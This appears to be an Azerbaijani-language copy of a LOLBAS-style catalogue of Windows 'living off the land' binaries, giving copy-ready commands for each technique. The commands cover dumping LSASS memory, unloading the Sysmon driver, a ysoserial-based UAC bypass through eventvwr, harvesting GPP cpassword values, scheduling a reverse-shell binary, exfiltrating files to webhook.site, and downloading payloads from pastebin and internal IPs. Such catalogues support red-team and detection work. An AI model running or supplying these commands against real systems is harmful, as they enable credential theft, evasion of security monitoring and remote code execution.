Execute
AddinUtil 'Addins.Store' faydalı yükünün mövcud olduğu kataloqdan icra edilir, AddinUtil 'Addins.Store' faydalı yükünü yerinə yetirəcək.
Copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.
Download
AppInstaller.exe URI üçün standart işləyici tərəfindən yaradılıb, o, paketi URL-dən yükləməyə/quraşdırmağa cəhd edir.
Copy start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
AWL Bypass
Quraşdırma Provayderi və lazımi qovluq strukturu ilə C# kodunu yerinə yetirin.
Copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
Execute
Hər gün müəyyən bir vaxtda yerinə yetirmək üçün təkrarlanan tapşırıq yaradın.
Copy C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Execute
Qeydiyyatdan keçmiş Assistive Technology (AT) işə salın.
Copy ATBroker.exe /start malware
bash.exe-dən calc.exe-ni icra edir
Alternate data streams
Copy bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
Execute
Copy certoc.exe -LoadDLL "C:\test\calc.dll"
Download
Copy CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Download,Encode,Decode
Copy certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Download,Upload
Müəyyən edilmiş faylı WebDAV serverindən hədəf fayla yükləyir.Müəyyən edilmiş faylı WebDAV serverinə yükləyir.
Copy type \\webdav-server\folder\file.ext > C:\Path\file.ext
type C:\Path\file.ext > \\webdav-server\folder\file.ext
Credentials
Execute
Copy cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Copy
Upload,Download
Copy ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
ConfigSecurityPolicy.exe https://example.com/payload
Execute
Compile
File.cs-də saxlanılan C# kodunu tərtib etmək və tərtib edilmiş versiyanı My.exe-yə çıxarmaq üçün CSC.EXE-dən istifadə edin.
Copy csc.exe -out:My.exe File.cs
csc -target:library File.cs
Conceal
Copy DeviceCredentialDeployment
Dump,Execute
Hazırlanmış disk kölgəsi skriptindən diskshadow.exe istifadə edərək əmrləri yerinə yetirin.
Copy diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
UAC Bypass
Başlanğıc zamanı eventvwr.exe, eventvwr.msc saxlanan konsol faylını açmaq üçün istifadə edilən mmc.exe-nin yeri üçün HKCU\Software\Classes\mscfile\shell\open\command reyestr dəyərini yoxlayır. Bu reyestr dəyərinə başqa ikili və ya skriptin yeri əlavə edilərsə, o, istifadəçiyə UAC sorğusu göstərilmədən yüksək bütövlükdə proses kimi icra olunacaq.
Copy ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Credentials,Download
SYSVOL-da saxlanılan Qrup Siyasəti fayllarında saxlanılan parolu axtarın.
Copy findstr /S /I cpassword \\sysvol\policies\*.xml
Tamper
Təhlükəsizlik agentləri tərəfindən istifadə edilən sürücünü yükdən çıxarır
Copy fltMC.exe unload SysmonDrv
Execute
Copy echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Execute,AWL bypass
Copy msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Reconnaissance
GUI yaratmadan istifadəçi ekranını yazın. Siz qeydi dayandırmaq və çıxış faylı yaratmaq üçün "psr.exe /stop" istifadə etməlisiniz.
Copy psr.exe /start /output D:\test.zip /sc 1 /gui 0
Execute
Copy Pester.bat [/help|?|-?|/?] "$null; notepad"
Execute
Copy pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
Download
8080 portunda yerli olaraq yerləşdirilən xidmət üçün yönləndirilmiş portun internetdə nümayiş etdirilməsinə icazə verilir.
Copy devtunnel.exe host -p 8080
Execute,Download
Copy wsl.exe -e /mnt/c/Windows/System32/calc.exe
Download
Downloads payload from remote server
Copy winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
Execute
Copy VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
Awl Bypass
Copy Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Download, Execute
Copy squirrel.exe --download [url to package]
squirrel.exe --update [url to package]
squirrel.exe --updateRollback=[url to package]
Execute
Modul və ScriptBlock Girişi olmadan SQL Server PowerShell mini konsolunu işə salın.
Copy SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Dump
Copy sqldumper.exe 464 0 0x0110
Execute
Powershell-i remote.exe-nin uşaq prosesi kimi yaradır
Copy Remote.exe /s "powershell.exe" anythinghere
Uzaq serverdən yükü endirir
Copy ProtocolHandler.exe https://example.com/payload
Execte
Download
Copy mspub.exe https://example.com/payload
Execute,AWL Bypass
Copy msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Execute
Download
Copy Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
Dump
Copy DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
Dump
Creates a memory dump of the LSASS process.
Copy dump64.exe <pid> out.dmp
Execute
Copy dotnet.exe [PATH_TO_DLL]
MSI faylını C:\Windows\Installer-ə yükləyir və sonra quraşdırır.
Copy devinit.exe run -t msi-install -i https://example.com/out.msi
Execute
Dump
Copy createdump.exe -n -f dump.dmp [PID]
Dump
Copy rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Execute
Copy rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Execute
Copy rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
Websockets vasitəsilə global.rel.tunnels.api.visualstudio.com üzərindən əks PowerShell bağlantısını işə salır; əmr
Copy code.exe tunnel --accept-server-license-terms --name "tunnel-name"
UAC Bypass
Alternate DATA Streams
Copy wmic.exe process call create "c:\ads\file.txt:program.exe"
Execute
Copy rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
Execute
Copy ssh localhost calc.exe
Copy sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Execute
Copy rundll32.exe AllTheThingsx64,EntryPoint